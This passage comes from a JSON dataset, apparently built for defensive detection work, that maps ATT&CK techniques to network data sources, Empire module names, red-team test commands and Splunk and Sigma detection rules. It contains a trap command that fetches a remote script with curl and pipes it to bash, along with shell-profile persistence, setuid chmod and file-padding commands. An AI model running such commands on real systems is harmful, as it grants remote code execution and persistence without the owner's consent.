netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://www.justice.gov/file/1080281/download", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + null + ] + }, + { + "technique_id": "T1157", + "command_list": [ + "python/persistence/osx/CreateHijacker", + "python/situational_awareness/host/osx/HijackScanner" + ], + "commands": [ + { + "command": "python/persistence/osx/CreateHijacker", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/host/osx/HijackScanner", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/persistence/osx/CreateHijacker", + "ATT&CK Technique #1": "T1157", + "ATT&CK Technique #2": "", + "Technique": "Dylib Hijacking", + "Concatenate for Python Dictionary": "\"python/persistence/osx/CreateHijacker\": [\"T1157\"]," + }, + { + "Empire Module": "python/situational_awareness/host/osx/HijackScanner", + "ATT&CK Technique #1": "T1157", + "ATT&CK Technique #2": "", + "Technique": "Dylib Hijacking", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/osx/HijackScanner\": [\"T1157\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1160", + "command_list": [ + "python/persistence/osx/launchdaemonexecutable" + ], + "commands": [ + { + "command": "python/persistence/osx/launchdaemonexecutable", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/persistence/osx/launchdaemonexecutable", + "ATT&CK Technique #1": "T1160", + "ATT&CK Technique #2": "", + "Technique": "Launch Daemon", + "Concatenate for Python Dictionary": "\"python/persistence/osx/launchdaemonexecutable\": [\"T1160\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1154", + "command_list": [ + "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT", + "nohup is used for continuing program/script execution even after exit.", + "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT" + ], + "commands": [ + { + "command": "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "nohup is used for continuing program/script execution even after exit.", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history \"trap *\" | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1156", + "command_list": [ + "echo \"#{command_to_add}\" >> ~/.bashrc", + "echo \"#{command_to_add}\" >> ~/.bash_profile", + "echo \"/home/ec2-user/welcome.sh\" >>~/.bash_profile", + "echo \"/home/ec2-user/welcome.sh\" >>~/.bashrc" + ], + "commands": [ + { + "command": "echo \"#{command_to_add}\" >> ~/.bashrc", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"#{command_to_add}\" >> ~/.bash_profile", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"/home/ec2-user/welcome.sh\" >>~/.bash_profile", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"/home/ec2-user/welcome.sh\" >>~/.bashrc", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit bashrc_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bashrc -p wa -k bashrc_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bash_profile -p wa -k bashrc_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"nano .bashrc\" OR bash_command=\"vi .bashrc\" OR echo .bashrc | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"nano .bashrc_profile\" OR bash_command=\"vi .bashrc_profile\" OR echo .bashrc_profile | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Detects Suspicious edit of .bash_profile and .bashrc on Linux systems", + "id": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "status": "experimental", + "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "references": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. " + ], + "date": "2019/05/12", + "tags": [ + "attack.s0003", + "attack.t1156", + "attack.persistence" + ], + "author": "Peter Matkovski", + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "PATH", + "name": [ + "/home/*/.bashrc", + "/home/*/.bash_profile", + "/home/*/.profile", + "/etc/profile", + "/etc/shells", + "/etc/bashrc", + "/etc/csh.cshrc", + "/etc/csh.login" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin or User activity" + ], + "level": "medium" + } + ], + "external_reference": [] + }, + { + "technique_id": "T1166", + "command_list": [ + "sudo chmod u+s hello", + "sudo chmod u+s #{file_to_setuid}", + "sudo chmod g+s #{file_to_setuid}" + ], + "commands": [ + { + "command": "sudo chmod u+s hello", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sudo chmod u+s #{file_to_setuid}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sudo chmod g+s #{file_to_setuid}", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history \"chmod 4***\" OR \"chmod 2***\" OR \"chmod u+s\" OR \"chmod g+s\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "find Setuid: find / -type f -perm /4000 OR find / -type f -perm /u+s", + "name": "" + }, + { + "product": "Splunk", + "query": "find Setgid: find / -type f -perm /2000 OR find / -type f -perm /g+s", + "name": "" + }, + { + "product": "Splunk", + "query": "Create a scripted input to ingest the files with Setuid and Setgid bits set and compare it with the expectde whitelist.", + "name": "" + } + ], + "possible_detections": [ + "bash_history", + "scripted_input" + ], + "external_reference": [] + }, + { + "technique_id": "T1009", + "command_list": [ + "dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}", + "```", + "sha1sum welcome.sh >before", + "dd if=/dev/zero bs=1 count=1 >> welcome.sh", + "<<", + "1+0 records in", + "1+0 records out", + "1 byte (1 B) copied, 0.000221464 s, 4.5 kB/s", + ">>", + "sha1sum welcome.sh >after", + "cmp before after", + "<>" + ], + "commands": [ + { + "command": "dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sha1sum 